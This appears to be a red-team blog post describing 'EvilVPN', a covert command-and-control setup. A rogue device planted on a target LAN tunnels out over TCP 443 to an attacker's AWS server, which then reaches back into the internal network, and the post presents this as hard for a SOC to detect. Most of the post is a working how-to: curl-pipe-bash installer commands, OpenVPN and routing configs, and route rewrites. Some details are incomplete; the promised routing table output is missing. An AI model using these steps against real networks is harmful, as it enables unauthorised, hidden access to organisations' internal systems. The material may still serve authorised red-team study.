EvilVPN

Written By Steve Bell

Introduction

EvilVPN is a mechanism, in where a malicious device, referred to as the Network Spike, tunnels out of a targets network over TCP port 443 establishing a outbound TCP VPN  connection back to the EvilVPN Command and Control (C2) server. The EvilVPN Server then establishes its own UDP VPN connection back down the outbound TCP VPN tunnel back to the Network Spike. This allows the EvilVPN Server to access the LAN that the Network Spike is on connected to, bypassing port forwarding requirements, firewalls, etc. And making the connection very difficult for a SOC to detect as all that will be visible to them is a HTTPS outbound connection.

Use Case

Similar to other Network Spikes that utilise duel NIC techniques usually allowing the C2 server to connect over something like Cellular and then be routed out of the Network Spikes LAN interfaces. The EvilVPN method can be used in any scenario that allows the Network Spike to connect to the LAN and access the internet. Bypassing protections like RF Shielding/Monitoring or able to be used in highly remote locations where other connectivity mechanisms are not available. This allows you to Live of the Land of your targets network.

In a recent example G3 used this in a Red Team against a Bank in the UK where the G3 operator connected a clean Windows 11 Laptop to the Guest WiFi of the bank which acted as the Network Spike for a remote operator to then begin VLAN hopping out of the Guest WiFi Subnet. This then allowed the onsite operator to focus on other on-prem attacks.

How To

  1. On AWS Create a EC2 Instance that will be our command and control server referred to as EvilVPN.

    This should be a Debian instance. Add a second interface. And assign Elastic IPs to both.

  2. The second device will be the sharp end of the set up that will get deployed on target. In this document we refer to this as the Network Spike.

    This can be a stock raspberry pi.

    Use the PiVPN script to build a stock OpenVPN, UDP server:

    curl -L https://install.pivpn.io | bash

    Then create a user for the EvilVPN server

    pivpn add nopass

  3. Modify the Netplan Configuration: Back on the EvilVPN server we need to configure it to accept having two IP addresses on the same subnet.

    You can add a run script within the netplan configuration to apply the custom routing rules after the interfaces are brought up.

    Here’s the complete netplan configuration with a run script that will apply the necessary ip rule commands after the network interfaces are set up:

    network:
 version: 2
  ethernets:
    enX0:
      dhcp4: true
      dhcp6: false
      match:
        macaddress: 06:ab:96:36:58:bf
      set-name: enX0
    enX1:
      dhcp4: true
      dhcp6: false
      match:
        macaddress: 06:5c:67:37:79:09
      set-name: enX1

  4. Create a Script for Routing Rules: Next, you need to create the script that will set up the custom routing rules.

    Create the script at /etc/netplan/routingscript.sh:

    sudo nano /etc/netplan/routingscript.sh

    Add the following content:

    #!/bin/bash
    # Add routing rules for enX0
ip rule add from 172.31.21.210 table 200
ip route add default via 172.31.16.1 dev enX0 table 200 
    # Add routing rules for enX1
ip rule add from 172.31.29.250 table 201
ip route add default via 172.31.16.1 dev enX1 table 201

    Save and close the file.

  5. Make the Script Executable: Make sure the script is executable:

    sudo chmod +x /etc/netplan/routingscript.sh

  6. Add the Script to Run on Boot: Since there’s no networkd-dispatcher, you can ensure the script runs automatically by adding it to the /etc/rc.local file. If the file doesn’t exist, create it:

    sudo nano /etc/rc.local

    Add the following content:

    #!/bin/bash
/etc/netplan/routingscript.sh
exit 0

    ave the file and make it executable:

    sudo chmod +x /etc/rc.local

  7. Apply the Netplan Configuration: Finally, apply the netplan configuration:

    sudo netplan apply

  8. Verify the Routing Rules: After rebooting or restarting the network, verify that the routing rules have been applied:

    ip rule show
ip route show table 200
ip route show table 201

  9. Now run the same pivpn server script:

    curl -L https://install.pivpn.io | bash

    This time choosing OpenVPN but changing it to be TCP, not UDP, and keep it on port 443.

    Then create a user for the network spike:

    pivpn add nopass

  10. Disable Gateway overtake: On the network spike config, edit it to add a line:

    pull-filter ignore "route-gateway"

    This is to avoid a gateway loop between the VPNs.

  11. Config change on EvilVPN: Change IP on EvilVPN config to match the network spike VPN issued IP:

    remote 10.90.142.2 1194

  12. Run the servers. Now simply run the VPN configuration on the Network Spike first:

    sudo openvpn netspike.ovpn

    Then switch to the EvilVPN server and run the VPN configuration that goes down that tunnel:

    sudo openvpn evilvpn.ovpn

  13. Alter routing: Correct the routing with the below (change to the IPs that match your set up):

    sudo ip route del 0.0.0.0/1 via 10.83.78.1
sudo ip route del 128.0.0.0/1 via 10.83.78.1
sudo ip route del 10.90.142.2 via 172.31.16.1
sudo ip route add default via 10.83.78.1 dev tun1
sudo ip route add default via 172.31.16.1 dev enX0
sudo ip route add default via 172.31.16.1 dev enX1
sudo ip route add 10.83.78.0/24 dev tun1
sudo ip route add 10.90.142.0/24 dev tun0
sudo ip route add 172.31.0.2 via 172.31.16.1 dev enX0
sudo ip route add 172.31.0.2 via 172.31.16.1 dev enX1
sudo ip route add 172.31.16.0/20 dev enX0
sudo ip route add 172.31.16.0/20 dev enX1
sudo ip route add 172.31.16.1 dev enX0
sudo ip route add 172.31.16.1 dev enX1

    Your routing table should look like this:

Conclusion

You are now done, and the network spike will route traffic into your targets network as required.

Steve Bell
Previous

SEL-735 Remote Access
Next

Starlink gRPC Execution